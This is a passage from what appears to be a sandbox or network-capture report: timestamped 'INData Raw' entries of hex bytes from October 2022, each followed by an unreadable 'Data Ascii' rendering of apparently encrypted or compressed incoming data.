                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23160INData Raw: 3d 38 d3 54 f5 27 83 90 00 61 0b 66 39 f2 70 e0 b7 26 92 6d 44 2b 4a 7c b7 7b 97 96 b4 fb 58 e2 26 db 5f 0e 0d e4 5e 14 12 d3 40 2b 99 33 37 62 ac 77 6e f9 a5 bb 69 e3 d9 1d 06 da 89 61 ec bd 3d ce 05 9f e2 ea 7a b0 e8 cb 20 cb 04 03 1e df db cb 1f 69 4f c5 1c bd e5 24 92 4c f7 90 d1 ed 0d 4f 84 67 50 14 8d 53 88 34 79 1e d7 2f 4c d1 98 53 54 7d c1 f7 12 0c be 4f 51 67 03 dc df bb ab 74 e1 2b b7 a5 6b 4b 98 e9 58 6b 62 58 10 da 37 e8 cd 04 c7 f0 01 64 d1 45 48 b8 7d 38 5c 45 35 25 b9 c9 e0 a0 94 4c b2 4e 0d d5 ca 8d a2 54 7d e4 ea 62 30 8e 7b 6b 00 d0 2e cd fd 8b 22 c0 7e 4d 63 29 2d 36 4b 71 19 40 6c 49 a2 7a 0c 8a c1 03 1e 09 fc a0 53 d6 25 79 0e b8 4e f7 89 c5 47 28 6d 8b 1e 17 a5 12 dd c0 f2 55 c8 7e 6f fc 91 37 43 02 a3 3b 8a 48 dd a1 1d 6e 50 55 c1
                                                                                                                                                                                                                                    Data Ascii: =8T'af9p&mD+J|{X&_^@+37bwnia=z iO$LOgPS4y/LST}OQgt+kKXkbX7dEH}8\E5%LNT}b0{k."~Mc)-6Kq@lIzS%yNG(mU~o7C;HnPU
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23176INData Raw: 11 16 81 8c be f7 73 24 34 e4 c3 18 f7 fd 60 be 46 0c f6 36 6b 35 1b a6 5d ae 58 01 7f 97 d7 44 da 75 92 03 d5 a8 96 74 a6 dd a0 af f2 5c e0 eb 22 51 66 63 53 1f 4a b4 d1 f0 c7 7e ac 5d 9b ae 2f 4f a4 78 1e 0b e0 85 81 e7 09 4f 49 91 38 04 83 fb 1a 4d 71 d0 96 19 de 8f 69 8b 6b e6 ac 41 fb c7 2e ce fd 09 06 74 36 d7 d3 00 e2 4b 1c 79 67 f2 40 f4 17 96 49 05 c0 6f dd 4d 8a e1 0d 84 5f 85 60 48 4f 22 44 a8 4e 72 65 16 65 d1 08 d7 4c 96 f0 94 35 85 e4 b6 4e 76 70 b2 36 e7 2f c7 e5 8c 6e 84 0b ef 5e e3 09 60 b1 04 cf 6b e9 b6 68 b9 ad 3f 26 19 65 e8 42 c2 e0 1e d7 24 bd a5 f2 b9 10 e5 a9 40 e8 a9 0a f9 1f e7 dd 73 f6 4d 33 56 8f 51 06 4d 65 a9 ef 3d b9 fe 1e 99 eb 65 91 b0 02 93 74 ac 87 7f 66 b0 01 44 5a b8 e1 da b8 8e f1 bd ae ec 83 64 ef 5a 88 ba 10 66 05
                                                                                                                                                                                                                                    Data Ascii: s$4`F6k5]XDut\"QfcSJ~]/OxOI8MqikA.t6Kyg@IoM_`HO"DNreeL5Nvp6/n^`kh?&eB$@sM3VQMe=etfDZdZf
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23192INData Raw: d9 05 a0 80 91 68 c5 d7 33 91 4e 2a 8a 09 b9 1f e2 fe 78 f5 28 ab 11 6b d9 5f 34 e9 64 8b 84 e5 43 c4 14 0a 8e a1 c6 42 8d 7f b8 4f 36 62 f9 91 5b 37 69 c1 54 ea 72 35 ab 0d a3 f5 90 35 df 28 d2 2b 15 c3 d6 99 f1 a5 45 c1 d1 0c 1e 4c 01 48 8f 4e ec aa 9b a7 e1 1a 52 e1 b9 49 9c 3c ab a7 e9 d1 e8 e7 a7 4b d5 ef f9 ad 90 86 30 b8 79 44 43 05 3f 48 36 eb 65 eb 6b a9 26 af fb 75 03 ad 11 67 ea 0b 28 1e 0f 1f d2 68 15 1c 86 eb b1 ff d5 c6 94 02 12 71 5d 43 c4 d5 86 71 12 91 fa 29 8a f3 23 8c 22 88 dc 3a 0a cb ac 84 a7 c2 05 28 b9 4d 7c 95 a4 6c 8c d2 40 e2 7b 95 b9 5e a0 b8 14 17 d5 42 1f 91 3d 31 ac 20 a6 28 2f e8 f3 5c 5c cf be 0d ac 91 cd 3e 3f ab dc 2a 08 b3 24 15 49 7a b8 15 f1 c9 ff 82 c8 af 63 c2 b8 7a 0a b6 9d c3 ef 30 d3 76 f0 1c 2f f5 df 79 73 26 e3
                                                                                                                                                                                                                                    Data Ascii: h3N*x(k_4dCBO6b[7iTr55(+ELHNRI<K0yDC?H6ek&ug(hq]Cq)#":(M|l@{^B=1 (/\\>?*$Izcz0v/ys&
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23208INData Raw: 6a 89 d8 5a 94 31 a5 27 d6 75 f8 6d 9b cd 6c 15 e8 eb c5 3e bf 05 e7 97 e9 57 37 cc 5c 22 22 8e a0 45 dc e1 1a d2 dd 0d d5 24 3a b6 1e 79 92 b7 00 39 28 1b e9 06 17 97 a1 57 94 3c ca 90 d8 82 a3 80 df d7 57 d7 f8 99 c6 b6 1c 80 d8 58 0c bf 1a 75 58 01 d9 b1 80 9e 7a fa bd 2d 54 47 c0 0b 6b 1b 24 57 ad af dc ea 01 43 fa 0e 49 29 45 71 3b 1a 1e 40 1a 04 0b 55 20 de 3c 9e b0 ee 06 8d b9 7f 4e ad d9 a0 88 27 97 38 ac c3 ab 85 28 ea 33 7c 8f c5 76 21 23 16 3a ad 8c 35 f8 1d f3 a7 89 09 6c ba e8 73 af 97 90 b4 4e 39 ae 81 8b c9 85 96 df 09 65 c3 4b 05 b9 2e db 73 ff b4 fe 5b 4c 2f f6 47 e4 f4 bb ed 39 7e 89 64 c9 6d c7 36 a5 46 7d 2a b0 0c 8c fa e9 c9 12 02 45 77 25 59 61 a4 d0 f2 09 dc cb 33 65 60 5f df 9d 72 df 09 65 59 fa 67 c5 6d 98 8d 37 46 05 18 66 65 3d
                                                                                                                                                                                                                                    Data Ascii: jZ1'uml>W7\""E$:y9(W<WXuXz-TGk$WCI)Eq;@U <N'8(3|v!#:5lsN9eK.s[L/G9~dm6F}*Ew%Ya3e`_reYgm7Ffe=
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23224INData Raw: 7c df 8c 76 20 6c 55 b8 d1 92 a5 dc 4f ae b9 c7 52 ab 53 54 25 f0 51 01 f0 f5 74 27 69 9e 22 a9 49 c0 d8 95 eb 29 39 52 73 da 50 c3 a7 10 78 4e 29 f5 20 cf c2 b5 3a e9 a7 1e 1c 7d 66 fb ab f2 3f 97 ca 5c 9b 15 9b bd 86 50 58 ff 05 d8 5f e3 46 ba 03 df e6 81 f2 35 8f cf df 0d 64 72 0b 4c b8 18 a4 95 b4 5e 51 02 75 00 94 53 06 4f 5a 44 e3 bc cb 77 c4 29 9e b1 e0 47 26 b6 18 77 9f b5 7c f0 d5 7b 5d c0 43 9d 1c 7a 7c 52 af 7e 64 f4 a3 eb 4e 2c fd cf bf c7 ed e6 ba 55 45 39 4a f2 6b ab 48 0c c0 42 eb 45 1a 2e eb 08 38 5d 34 7d e5 78 94 3e 5d c9 78 e0 17 ef 0d 0a b8 1d 78 ff d9 e5 43 5c 66 0c 1f e0 11 c4 cb ca 1b e8 3e 36 89 3f 64 74 3f ff 14 ec df 04 c0 1b 5f 5f 91 21 91 b2 e1 38 18 48 ff 3f 48 5c f7 ce a0 ee eb 41 e4 ed c7 bb 25 31 4f b9 fd df db c4 90 0a c0
                                                                                                                                                                                                                                    Data Ascii: |v lUORST%Qt'i"I)9RsPxN) :}f?\PX_F5drL^QuSOZDw)G&w|{]Cz|R~dN,UE9JkHBE.8]4}x>]xxC\f>6?dt?__!8H?H\A%1O
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23240INData Raw: a7 8d b6 8d 85 54 58 9a 69 44 6e b3 c5 66 b0 eb af 08 9d 83 57 ab 22 d4 31 d4 d2 47 75 bb 58 c7 4b 5c 37 61 b4 45 f6 f8 28 4c 53 a0 a4 54 95 8d b9 82 ef fd f5 f2 79 c7 58 5c f7 7d 90 63 8d c8 30 6a ee 01 bf 89 e6 8b 17 a0 4c db cc 2d 84 4b b1 63 87 f7 c9 95 7b 4b 52 48 85 f0 37 ee e8 cd a9 48 f0 d0 4e ab c3 4d 26 25 8f 12 c1 6a 52 69 46 23 b3 5b d5 d2 46 d1 f9 6d 7d 07 22 21 39 c3 3b cc a7 94 96 47 29 2c c1 90 3e 76 9e af 00 94 c5 86 eb e9 55 1a d4 11 e8 17 e4 31 7d 76 09 14 72 c5 27 cc 5f bc 4d 77 be 9f 16 b4 66 8a c2 a7 e6 82 66 b2 7b bb 00 bf 4f 0c 29 ab 03 7c 95 e0 17 bb 4a 07 01 17 65 d1 d3 75 99 5d fa e9 ed f6 cc ba 11 e8 86 50 a9 44 6a 36 54 f0 50 49 ea 5d e0 dc b0 9c 5f e9 02 9c ad 8a 7d ce f4 e5 fa d8 48 49 44 96 5b 99 57 bb 58 13 e2 27 94 51 48
                                                                                                                                                                                                                                    Data Ascii: TXiDnfW"1GuXK\7aE(LSTyX\}c0jL-Kc{KRH7HNM&%jRiF#[Fm}"!9;G),>vU1}vr'_Mwff{O)|Jeu]PDj6TPI]_}HID[WX'QH
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23256INData Raw: be a9 b5 e2 c1 5a 39 93 f2 bd ae 3a 36 74 8d 53 5c a4 dd ea 16 6a ba a0 2e 37 fe f6 be 67 39 16 4d 87 e7 f1 27 6d 29 1e 70 c8 0a b4 25 d5 11 20 66 99 a5 f2 8c b8 40 97 63 a0 82 1c 8f 6c 7a 57 ba c1 34 58 a8 22 40 f5 92 36 5e 50 80 42 66 12 a1 db c7 27 75 00 da ec 58 f2 1a 5c 52 94 7c 6a ab 99 57 12 eb 2b 34 ca 2a 71 76 2f 44 7a 60 38 24 7b 96 8a f1 de 08 52 b7 9e 26 e8 f0 b3 9b f8 bd f5 6a f7 df ac 09 c9 18 60 f0 02 57 53 51 cb 0c f6 52 eb 45 8d b0 3a 4a 29 77 74 ab 29 d8 5e 94 f7 9d e0 ea 1e a7 13 bc fb 56 ef b2 e3 02 c1 56 8f 42 5f 17 5a 6f c6 f6 24 2a bb 7e 6b 17 4b 8f 89 e5 57 5c 8b fe f4 96 ee 92 81 cd 30 8e 0c 8a 1d dd ec d8 77 4c 64 87 ac 5b 3e 99 44 54 aa 8b 27 d6 f3 4a c3 00 0e 33 64 8b db 3d 7a cf 7a 98 5e 19 c2 ea 95 59 d8 68 d9 9f 83 15 57 04
                                                                                                                                                                                                                                    Data Ascii: Z9:6tS\j.7g9M'm)p% f@clzW4X"@6^PBf'uX\R|jW+4*qv/Dz`8${R&j`WSQRE:J)wt)^VVB_Zo$*~kKW\0wLd[>DT'J3d=zz^YhW
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23272INData Raw: b3 14 30 c3 30 4e 42 a8 4a 18 33 7b 15 00 e4 20 9a d9 2a 4b c9 a3 0d 41 90 b1 5a a4 f0 ff a1 df bd 4b a7 d6 73 62 c4 fb e1 af ad 34 87 39 7d 14 5b b3 bd 96 99 ea e0 fc 9b d7 28 ea bf a8 0e c6 50 60 97 ca cd 21 d0 52 82 37 df 37 e5 1b d9 78 c1 49 92 10 a4 d7 47 f3 c3 fa 31 3a 5a 85 77 d2 f6 a0 a4 cb d8 09 c2 31 e8 9b 95 29 5d 40 11 5f ad 41 5c c2 d7 b2 4a bc e5 76 cc 39 01 9a f9 58 3e b2 19 e8 df 96 a2 9e 08 fd 38 80 3f dd f7 99 1b ca dd a6 b7 2b 85 3f ea 32 ca 74 03 0a 22 7b 1a 55 4a 6d d8 56 41 ce 38 ae 55 ff e8 87 eb 3a 9e 55 7a ae 81 ef f8 c2 60 88 cf aa 48 31 e0 7c 87 dc 42 fd d2 01 74 0d 91 ff f4 f0 bd e7 33 50 4a cf 2b 2c 97 64 1d 26 96 df 7f f5 f1 ac 3d f7 14 76 e8 c0 0c 93 79 10 fb 9d 63 d6 f2 a4 6c e3 76 79 32 ae bf 70 23 14 03 9c 4c 87 5b 2c 38
                                                                                                                                                                                                                                    Data Ascii: 00NBJ3{ *KAZKsb49}[(P`!R77xIG1:Zw1)]@_A\Jv9X>8?+?2t"{UJmVA8U:Uz`H1|Bt3PJ+,d&=vyclvy2p#L[,8
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23288INData Raw: b2 c8 b6 8f 6d 57 27 57 9c 19 dd bd a1 f8 8c 1d 4b 31 a2 0d 85 d8 20 6a 8b 93 47 f1 07 1c 30 3f a3 ce 87 2a 28 e4 b8 a2 53 dc 63 11 f7 7c d4 9f 0a 4d 3c a1 86 1b 5b 1a 4f fe ba cd f2 79 16 78 66 a2 dd 71 a3 80 56 47 df 5e c2 1d 9d c3 6b 5c 7e f5 f8 1d db 5f 02 78 42 fc 8a ea 2c f7 29 47 a3 1d fe 0b 1f 6d d3 b4 c9 c4 75 01 6c 71 89 73 9c 22 32 69 bf 17 db 28 8b cf c2 d6 60 ff e3 9d 91 65 f1 bb ef 87 6c 4e fb 87 88 64 f8 c7 28 98 93 2b 07 6f 68 6b eb 91 ad 9b d6 aa 11 14 e3 fb 2e 7a b8 2d d5 01 e3 0d e6 1a c4 16 23 69 81 c8 05 bb 7e cd a5 fd 34 99 36 04 2e fa 56 c9 61 eb 09 ca 4b 84 6d 19 5f 18 f5 20 de 49 99 1e f1 2d 7d 6c b9 c3 a9 be 02 3f 8c 28 c5 39 42 51 73 21 0c 8d db 6a 40 85 27 e6 52 80 d5 86 76 e6 4d 80 fd 80 ad 37 ab f8 3e e2 d6 04 9f 63 2e c7 ed
                                                                                                                                                                                                                                    Data Ascii: mW'WK1 jG0?*(Sc|M<[OyxfqVG^k\~_xB,)Gmulqs"2i(`elNd(+ohk.z-#i~46.VaKm_ I-}l?(9BQs!j@'RvM7>c.
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23304INData Raw: a9 c7 26 a5 c2 22 03 1d 1e 16 85 ea ba 69 a2 54 97 17 7d 49 6c 4c 03 f6 d0 c9 de 76 38 b7 01 36 3b 12 84 6b d2 46 fe ce 46 0a 45 43 4b 93 eb 6a c2 b0 81 98 16 ac df a0 73 78 33 3b f9 15 b6 97 c1 c7 b2 e7 06 6a eb 95 9a 5d 94 a0 ad 36 8f 31 23 9f 40 c8 16 f1 e1 e2 ef ca 0a b8 95 f5 54 0f 21 95 e6 27 91 55 af f7 e1 ad dd 9e 00 8f eb 0b 13 32 11 bc c4 ab 86 f5 5d 70 b4 a6 cb 82 07 13 6f 40 08 22 1e 33 d0 e0 45 e1 5a 95 49 63 45 42 44 84 11 1c f7 6f 57 81 c0 8b 1d d8 83 4c db c4 a2 f5 d8 fa 05 5b b3 1a 41 cf a8 49 27 40 d9 61 42 92 da ad ce 62 93 ea c7 91 c6 3f e6 0e d2 db 88 71 f9 a0 29 95 6f e4 c2 4a 27 15 0a 02 8e 8e 36 0f bf ab cc af 77 2d 93 55 b3 25 6f 38 3b 94 95 52 7e d9 fa ec 27 dd 31 92 a3 df f4 35 2a 2f b8 e5 04 e5 e8 aa 5e 55 63 7d 58 22 f4 72 38
                                                                                                                                                                                                                                    Data Ascii: &"iT}IlLv86;kFFECKjsx3;j]61#@T!'U2]po@"3EZIcEBDoWL[AI'@aBb?q)oJ'6w-U%o8;R~'15*/^Uc}X"r8
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23320INData Raw: 2f 5d 87 56 eb f3 cd ea 40 b6 cb d9 e6 ee a5 74 04 08 24 db f3 e1 c2 2e c5 45 4a cb 97 70 0e 62 8a 64 1f 12 3d 4e da fc b8 87 8a 64 17 32 8c eb bb ed 55 e7 22 36 35 33 d9 1d 78 b8 85 c9 0c 22 07 4b 5f d0 8c d4 4e db 78 9a 59 d0 a4 38 b4 f4 60 ff c4 97 01 20 8b 2c 06 51 c1 10 8a 7b 29 f1 a6 83 b0 84 d6 ea fb 8e eb 97 eb 55 19 54 06 0f 79 4f 04 7b de 18 ee 75 0c 17 ed 43 30 d7 df c2 92 23 18 46 53 b7 71 82 81 62 ab a2 4c d2 62 e2 33 df f5 68 b4 80 2e ae 63 93 af 63 1a 89 09 1f e9 38 a5 71 2f de 7f 58 c2 9f ba 35 76 0b 0f 55 39 75 f0 08 24 21 36 5a 51 d8 06 37 b5 80 62 22 3e 82 34 98 9a 7f 54 03 02 1f ce f3 76 92 98 ec 70 70 47 8e 2f a6 c0 1a 65 c1 e1 8b c8 63 ea 7a ee 01 f8 29 c3 1c 36 fc 89 b5 91 4b 9d 71 d5 83 da 76 87 68 47 24 89 5e 6f 5e 98 46 bf b7 70
                                                                                                                                                                                                                                    Data Ascii: /]V@t$.EJpbd=Nd2U"653x"K_NxY8` ,Q{)UTyO{uC0#FSqbLb3h.cc8q/X5vU9u$!6ZQ7b">4TvppG/ecz)6KqvhG$^o^Fp
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23336INData Raw: 42 c1 88 51 a6 2f 8e 44 53 c4 3a 18 8e d4 3b ac 19 0b 1e 73 5b 43 60 f2 fa 7a 1c 3a ca 2c 15 f3 d0 ef a5 7b d5 8a 17 d5 ba 49 02 cc 0b ca 14 53 bd 8e 92 55 fb a7 c6 62 32 9b ef fd 2f 92 7f 2b 2a c8 73 c7 cc a3 88 98 94 d3 d3 55 2b 40 40 ff 63 91 9a c1 88 3b 90 36 d2 fa ed 99 35 d3 76 c6 61 a0 d0 7c e6 ca 2b c8 1a b0 6f 65 d3 b6 9d 54 3f b6 fd 0e be 15 ad 18 0b df 6c 4f e6 3f ba 72 a2 65 b2 10 e9 00 d6 c2 3a b1 11 17 5e a1 ab 67 5f 75 4a 4f 89 d3 5b ad 69 9e 51 a8 80 66 3f f7 0e 92 e3 5f d5 90 e8 32 bd d5 3b a6 28 16 07 55 3d c5 75 8e 3e b5 41 c8 21 99 77 07 df 47 77 fe f0 70 5b 88 d1 b7 e0 21 9c 63 6d 57 01 9b 31 46 ce 30 b7 1f 65 88 68 8d 69 97 f4 4f ef 61 38 b4 06 72 5c 38 23 9c c8 07 18 59 ea fb 9c 63 d4 c9 e8 ed 57 33 e5 c0 f1 f0 4e 2d 44 4f 43 c9 f7
                                                                                                                                                                                                                                    Data Ascii: BQ/DS:;s[C`z:,{ISUb2/+*sU+@@c;65va|+oeT?lO?re:^g_uJO[iQf?_2;(U=u>A!wGwp[!cmW1F0ehiOa8r\8#YcW3N-DOC
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23352INData Raw: 6d 8a f7 34 74 5f 88 ac 8c b9 3d 33 54 cd 89 e7 46 8c 29 e8 e4 79 0c b5 f3 6c 03 e9 4a 08 b1 64 c5 05 0f 9f 9d 5e e0 fa f5 64 fc 81 d9 57 24 bb db e2 4b 61 0b 49 af 3a 77 c4 3c 4e 0e fd a5 29 7c 6e 10 20 c5 d6 c1 f5 fa f4 22 db 38 93 c3 bc 52 dd 95 ef 42 c2 24 b5 c3 6c 8e f6 ac 70 9a 7f 32 63 a3 c1 d7 17 c9 a8 be 62 91 35 c6 55 7e 12 91 db 84 ef b2 7c 8d 43 de 19 e5 74 95 74 d9 05 2b 6c 8f e5 1b fb 34 f4 38 b8 5b 3b 41 82 cd 83 87 87 28 2c 65 c3 01 7e a3 7b e7 98 98 48 f4 08 8e fb cd 26 49 08 71 47 8f 51 4f a5 98 7a 31 64 7d 4e c4 05 e0 86 03 f3 18 e6 67 e0 bd 14 80 47 05 90 90 dd f9 af 18 c8 e6 83 ee b6 e8 78 15 56 15 e8 dd 6a d7 fd 98 3c 7e 9f a0 e2 f5 f4 f6 7b 4c 71 86 59 4e 2f da 94 2c a4 9f f1 c4 4f ce c7 1c 96 1d 14 c9 2f 11 9c 0e dd a7 59 28 5a c5
                                                                                                                                                                                                                                    Data Ascii: m4t_=3TF)ylJd^dW$KaI:w<N)|n "8RB$lp2cb5U~|Ctt+l48[;A(,e~{H&IqGQOz1d}NgGxVj<~{LqYN/,O/Y(Z
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23368INData Raw: 28 31 b0 26 4f 76 06 79 09 67 cc ca c4 0b 2a 81 2c 18 1a ca a2 a6 d0 93 19 ea 50 6c 1d f3 16 b9 d3 04 ce b3 1c 88 c1 1f 7f 4e ad 91 0f 64 38 dd 74 77 70 51 6d 57 1a 13 c9 83 dd b7 5d c6 bc 98 e5 da 1d 21 00 4f ad 53 69 6f e6 1a 69 3d ec 36 52 7a aa ff 4b f0 80 7a 45 89 75 13 48 6c f7 73 59 24 a0 5c bf 0f a8 ef 7f 19 e3 72 3c d6 e5 5e 45 20 4d 60 4e 1b 51 48 66 4c 3c dc 19 63 17 fe 62 01 a8 b0 e4 4d 8a 33 3b 1a 2d 03 1a df 1a 77 37 b3 23 45 c9 9f 46 49 22 22 4b 8a cd c7 fe cd 6f b8 eb a1 25 6a 9f 78 e9 14 c7 73 2f 3f 7a 0f 38 d5 e3 e3 42 50 2f a4 72 88 73 91 33 7f a2 8f 76 ab 13 a3 8a 37 d1 5c c3 28 06 a0 6d 6a c1 32 78 cd d5 a3 22 b0 bf 44 3a 22 26 b2 e2 6a e4 2e 6a 07 38 f1 83 85 67 bc 3c db 5c 13 62 be cf e2 de ab b0 23 56 cf 1f 48 45 b3 13 43 78 89 6a
                                                                                                                                                                                                                                    Data Ascii: (1&Ovyg*,PlNd8twpQmW]!OSioi=6RzKzEuHlsY$\r<^E M`NQHfL<cbM3;-w7#EFI""Ko%jxs/?z8BP/rs3v7\(mj2x"D:"&j.j8g<\b#VHECxj
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23384INData Raw: 9a 85 45 40 15 9b 23 51 56 24 df 69 72 bf c9 f8 07 9b 1a 8f 0d 83 e5 4f 45 b7 2b a0 73 39 6b b0 c9 ad e2 ad 0c b6 b6 bb 00 78 b2 99 50 ea 41 53 2b e1 33 eb f3 08 70 f0 9a 92 50 7f 07 dd df 11 0d 91 0a 62 ba 65 70 44 98 e6 e1 ac 4e 5a 0a fa 02 62 2c 65 e7 63 34 7e 70 0a ef 97 29 d1 6b b7 85 07 dc d8 53 8c 3a 40 1b 2e 9d 7b 7c a4 77 97 d8 88 1f 97 a0 65 f0 4d 2c 77 51 31 22 54 ff 45 a0 3f 01 6a ba fc 5d 2a 23 cd a4 b8 6d b2 64 bc c2 97 39 fd 0d 23 09 28 39 f2 12 15 22 e0 fd 77 f9 38 72 bf 22 49 b9 fb c8 8d 19 71 db e2 3c 77 7b 2a ed 5d f6 9b c4 8d 15 c6 31 12 9d 70 b6 e9 67 a2 64 5a 4a 5d 5c 11 57 1b 0c 91 87 a2 c1 ff f9 b2 1f e8 43 4d fc e5 87 e0 69 40 bd 4b 00 35 0f fd a6 38 9f ef 1e 9e ba a9 d3 cb 16 28 07 a8 70 7f 5d d2 ee 51 82 ea 1e a2 12 f9 79 f6 c4
                                                                                                                                                                                                                                    Data Ascii: E@#QV$irOE+s9kxPAS+3pPbepDNZb,ec4~p)kS:@.{|weM,wQ1"TE?j]*#md9#(9"w8r"Iq<w{*]1pgdZJ]\WCMi@K58(p]Qy
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23400INData Raw: 62 55 3f a3 d4 79 11 e8 01 f7 f1 08 f3 97 9d ee 49 fa 79 a2 3a 50 aa e4 99 08 42 9e 52 2e 80 67 a6 da 48 a4 54 74 2f 71 f3 8e fc 32 00 a6 2b a0 fc a6 30 81 5b 8b f1 d6 e1 f5 dc 14 eb 37 e1 9c a8 a0 50 ae 87 c6 4b 86 f5 b5 14 fb ee a3 77 41 e6 40 2d c2 c9 10 35 68 77 6b e9 a0 b6 98 a7 fb a5 d6 1b 2b e1 ac 4f fe 7e dc 71 c4 d4 62 1b 81 a0 9c 45 5e a4 79 c3 50 67 27 09 9a 8b 04 90 49 80 d1 1c 2a 8c 24 bb 54 39 8e de d1 52 a0 89 1b 3b 03 47 d3 0c 65 e1 d7 d4 87 47 16 b0 73 85 4b 5e 63 78 6b 83 73 f5 e5 71 8a 8e a8 77 16 9c f9 31 bc de 32 75 e0 4e 54 1b 5d eb 1a 3c a6 14 1c 53 0a 8a 62 1c 74 b8 31 1b 37 3f ab a4 8b 00 39 f3 0a 50 7d d2 6f e9 25 1f 47 53 a4 8c 81 57 c0 80 cc db 12 69 ee 1a 33 af 4c fe 4c 8d bc 89 04 dc e4 c0 24 7e 8e b2 73 6e a8 f6 2a 1b ef d1
                                                                                                                                                                                                                                    Data Ascii: bU?yIy:PBR.gHTt/q2+0[7PKwA@-5hwk+O~qbE^yPg'I*$T9R;GeGsK^cxksqw12uNT]<Sbt17?9P}o%GSWi3LL$~sn*
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23416INData Raw: e6 45 d6 f1 67 34 aa a2 1c 6a 4e 93 4a 6c 03 53 ec 9b d3 44 f7 25 a4 09 59 33 45 aa 78 07 a6 6d d6 4b 08 63 61 03 39 64 e0 df c6 52 6b f6 7c a8 a1 c0 77 eb 2e 70 15 fa 2f 8b e3 56 09 c0 de f0 31 d2 6b 9a b4 ed 00 c8 22 02 bd b2 e0 32 6a fc b8 3c 44 2d e2 c8 c1 00 91 85 f8 9e ec 13 21 d4 b6 2c f4 32 67 47 3b cd 47 88 e9 b2 c6 e2 76 d5 e9 a9 83 3c eb 6b 07 38 f2 b6 63 8d 6f 4f 2d 48 c0 ba 3c c6 ba 0c a3 5c bc 32 6d d7 1e 31 ed 62 39 2e 24 47 75 2e b6 8b 13 74 5c dd 24 da 4f f8 f0 df 52 c3 96 cc 94 8c a3 d0 af 47 47 8f d7 c1 28 16 84 cb 79 25 f3 62 f5 46 02 84 be e1 f6 8c d4 3e 4b 44 76 a2 d1 1d 78 7f da f6 80 0c ad 7a a9 82 93 59 3e 7b a0 59 b8 49 99 a3 0c 04 1b 1e 36 5b 73 fd ee 82 e9 01 1c 74 e4 95 81 81 c2 c5 f2 ee a2 46 04 84 da 4d fa 5a 19 fb 8e 42 cc
                                                                                                                                                                                                                                    Data Ascii: Eg4jNJlSD%Y3ExmKca9dRk|w.p/V1k"2j<D-!,2gG;Gv<k8coO-H<\2m1b9.$Gu.t\$ORGG(y%bF>KDvxzY>{YI6[stFMZB
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23432INData Raw: 2d 1f c3 12 3e f8 6f d7 24 fe 8d 6e 8c a8 62 1b 17 8d 67 b3 56 f5 ec e4 e3 4c 7f 12 a0 ba b1 81 e3 3e 80 07 88 27 c9 f1 e2 b1 ba 07 4a 8b 85 b2 63 bf 9e 89 29 20 0b 34 93 b5 c0 2c d0 ab 3a 19 1d 0a b8 d1 28 19 b3 b9 a2 ee 75 ac 6d f6 e9 47 f0 40 1e 8c 0b 01 04 96 7c 38 e2 28 61 63 05 07 47 81 d8 14 67 ac a8 bc 9c e1 30 89 4e 4b 68 1e 82 86 b0 cb cf d1 79 ab a6 e4 86 3c 16 67 b7 d3 c6 12 91 90 79 18 76 d2 6f a3 79 04 c5 a3 37 ec 23 fc 93 94 a9 36 0e 16 82 9e 43 7b d9 15 5b c1 1a b5 71 dd 21 59 3e 4c 4c ef 43 ce 38 0f d9 4e 29 08 2a 89 85 84 99 64 ee 07 bc eb 10 a2 d7 78 29 cf 06 fe 93 75 63 3b ed c0 fe f5 43 fa 12 ca c5 a3 73 8a 34 60 c0 70 57 06 79 bb dc 69 77 17 ba ef 66 96 07 9f 07 6a 7a ee 21 11 40 65 92 55 94 c0 98 75 15 ba 48 df 53 66 46 2a f3 db 2e
                                                                                                                                                                                                                                    Data Ascii: ->o$nbgVL>'Jc) 4,:(umG@|8(acGg0NKhy<gyvoy7#6C{[q!Y>LLC8N)*dx)uc;Cs4`pWyiwfjz!@eUuHSfF*.
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC23448INData Raw: 61 a2 09 f3 31 53 fd 72 68 6b b4 c2 8b 11 f5 6f 2e 24 16 24 87 e5 a2 cd eb 40 5c 34 cc 32 29 6f 22 fb d2 39 84 59 1c 99 94 d8 d1 59 86 3e a3 a1 33 4e 25 76 26 c1 8c 2d 07 c4 11 68 2a 8d d9 72 77 50 99 db 90 06 09 0d d5 94 e3 da 54 58 e6 a1 fa 07 2f e8 2b 3f cd b4 5d 3d 2a b3 59 b1 f4 28 63 82 b8 74 ac 38 aa ee c9 37 91 30 43 b9 6a 76 2b 4a b1 16 7b 7b fc c0 07 19 7c fd b1 95 aa 7d af 57 dd c9 0b df 8a 8e 2f 58 90 5f 60 63 f8 51 9f 46 fa e9 ce b5 99 1a a1 4c 68 54 fa 05 b0 1d d2 33 b5 1a 37 7e 19 54 16 ba fe 68 47 e0 ef ed 87 0b b4 5c 04 22 18 8f 68 29 d7 a5 06 c6 f5 d5 7b 14 9e 2f 2f 50 61 a5 49 a2 f4 c6 b0 92 ff ce 95 06 92 fb c3 62 74 73 07 37 1d ed b4 a4 af 79 5b d0 ac e2 38 ab 79 9b 8d c1 43 ff d4 48 ba db 03 a7 f5 27 67 3f 7e f0 49 8e dc d2 ea 0c ff
                                                                                                                                                                                                                                    Data Ascii: a1Srhko.$$@\42)o"9YY>3N%v&-h*rwPTX/+?]=*Y(ct870Cjv+J{{|}W/X_`cQFLhT37~ThG\"h){//PaIbts7y[8yCH'g?~I
